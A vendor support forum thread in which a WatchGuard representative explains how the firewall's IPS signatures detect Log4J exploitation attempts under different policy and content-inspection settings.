Log4J

AbertayAbertay
in Technical Discussion

Do we have a method of spotting Log4J attempts in watchguard cloud yet?

--
WatchGuard M4800 (x2 Cluster)
WatchGuard M690 (x2 Cluster)
Firmware : 12.10.4

Comments

  • james.carsonjames.carson Moderator, WatchGuard Representative

    HI @Abertay
    This will most likely be in the form of an IPS update which should be released soon. If this is the case, you'll be able to search for denies based on that IPS signature.

    -James Carson
    WatchGuard Customer Support

  • james.carsonjames.carson Moderator, WatchGuard Representative

    @Abertay IPS updates are live:
    https://techsearch.watchguard.com/KB?type=Security Issues&SFDCID=kA16S000000SNnuSAG&lang=en_US

    Signature IDs are in the KB article

    -James Carson
    WatchGuard Customer Support

  • DaveDaveDaveDave

    Hi James,

    Could you clarify the following scenarios in which the IPS signature will work?

    a) HTTPS server behind a packet filter rule with IPS enabled
    b) HTTPS server behind a proxy filter rule, DPI not enabled and IPS enabled
    c) HTTPS server behind a proxy filter rule, DPI enabled and IPS enabled

    Just want to ensure that there are no gaps.

  • james.carsonjames.carson Moderator, WatchGuard Representative

    Hi @DaveDave

    Ideally it'll work the same for all of those policy types, but IPS has the best chance of detecting things with content inspection enabled.

    *I am purposely using the term Content Inspection, as that's how it's labeled in the firebox and in our documentation.

    a) HTTPS server behind a packet filter rule with IPS enabled
    b) HTTPS server behind a proxy filter rule, Content Inspection not enabled and IPS enabled
    A and B would behave the same, and IPS will scan traffic based on signature examples. Since the LDAP attack (the attack vector in the vulnerability) has distinct characteristics IPS can usually still detect this.

    c) HTTPS server behind a proxy filter rule, Content Inspection enabled and IPS enabled
    C would have a better chance of working should differentiations on the attack vector be discovered, since the proxy will have decrypted the actual traffic. Running content inspection also allows Gateway Anti-Virus, Intelligent Anti-Virus, APT, and other scans to take place. I would suggest running proxies with content inspection if at all possible due to these added benefits.

    If you're looking for a more simple way to convey it, consider:
    -A person in a trench coat
    -3 children in a trench coat.

    Even though the children are covered by a trench coat, it's still easy to label characteristics that lets you spot them. Arms may be too short, they may walk differently, etc.

    The children might get better at disguising themselves, so having everyone take their coat off is still the best way to protect against that specific thing.

    -James Carson
    WatchGuard Customer Support

Sign In to comment.